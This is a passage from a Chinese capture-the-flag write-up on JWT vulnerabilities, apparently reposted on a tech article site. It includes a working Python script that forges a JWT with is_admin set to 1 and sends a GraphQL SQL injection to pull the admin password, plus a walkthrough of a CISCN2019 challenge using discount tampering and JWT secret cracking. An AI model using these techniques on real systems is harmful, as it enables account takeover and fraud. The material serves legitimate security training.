  PASSWORD TEXT NOT NULL,
  SCORE TEXT NOT Null  
)

因此可以用這個來查詢admin用戶成績,構造最終payload如下,

import json
from jwcrypto.common import base64url_decode, base64url_encode
import httpx
?
session = httpx.Client(base_url="http://eci-2zeavdwsk859vkrseg75.cloudeci1.ichunqiu.com/")
session.post("/signin", json={
   "username": "test",
   "password": "111"
  }
)
_ = session.cookies.get("token")
[header, payload, signature] = _.split('.')
parsed_payload = json.loads(base64url_decode(payload))
parsed_payload['is_admin'] = 1
fake_payload = base64url_encode((json.dumps(parsed_payload, separators=(',', ':'))))
forged_jwt = '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
session.cookies.delete("token")
session.cookies.set("token", forged_jwt)
?
data = {"query": """{ getscoreusingnamehahaha(name: "null' union select password FROM users WHERE name='admin'; --"){ score name } }"""}
response = session.post("/graphql", data=data)
print(response.text)

得到密碼后去登錄即可得到flag

[CISCN2019 華北賽區 Day1 Web2]ikun

進入后發現有登錄和注冊界面,常規操作先注冊后登錄

在這里插入圖片描述

提示要買到lv6,下劃后發現可以買等級

在這里插入圖片描述

這里沒有lv6,點擊下一頁看看仍然沒有找到lv6,但發現引數是GET型傳參

在這里插入圖片描述

這意味著我們可以寫個小腳本來查找lv6所在位置發現lv3對應的代碼是lv3.png,那么lv6對應的就是lv6.png

在這里插入圖片描述

腳本如下

import time
import requests
url = "http://8e197801-2f87-4e36-aee6-a2390b0f391e.node4.buuoj.cn:81/shop?page="
for i in range(1,300):
   res = requests.get(url+str(i))
   time.sleep(0.5)
   if "lv6.png" in res.text:
       print(i)
       break

 

在這里插入圖片描述

181頁,找到后發現價格是天價,買不起

在這里插入圖片描述

這里抓包看一下

在這里插入圖片描述

發現可以修改折扣,把這個discount修改為0.00000000000001然后發包

在這里插入圖片描述

跳轉到了另一個界面但無權限訪問再抓包

在這里插入圖片描述

發現JWT,解碼一下(解碼網站https://jwt.io/)

在這里插入圖片描述

我們這里想實作修改root為admin,需要有密鑰,爆破密鑰可以用工具c-jwt-cracker得到,鏈接如下https://github.com/brendan-rius/c-jwt-cracker破解后得到密鑰為1Kun

在這里插入圖片描述

抓包,將得到的值賦給JWT,再發包接下來就是讀取原始碼,然后進行Python反序列化獲取最終flag,這里不再演示,

后言

JWT的靶場有很多個,我這里也只是利用了CTFhubportswig等來進行演示,還有一些靶場例如https://jwt-lab.herokuapp.com/challenges也是比較好的,但鑒于考察點相似,這里不再演示,有興趣的師傅可以自行嘗試,然后還有就是這里的CVE漏洞的分析我主要參考了我們戰隊lemon大師傅的講解,大家也可以看一下哇,視頻鏈接如下https://www.bilibili.com/video/BV15d4y1F7i3最后的話本人也只是一個小白,如果有問題還請各位大師傅多多指教,

更多靶場實驗練習、網安學習資料,請點擊這里>>

 

合天智匯:合天網路靶場、網安實戰虛擬環境

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/539923.html

標籤:其他

上一篇:第九次打靶

下一篇:想做長期的 AB 實驗?快來看看這些坑你踩了沒

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more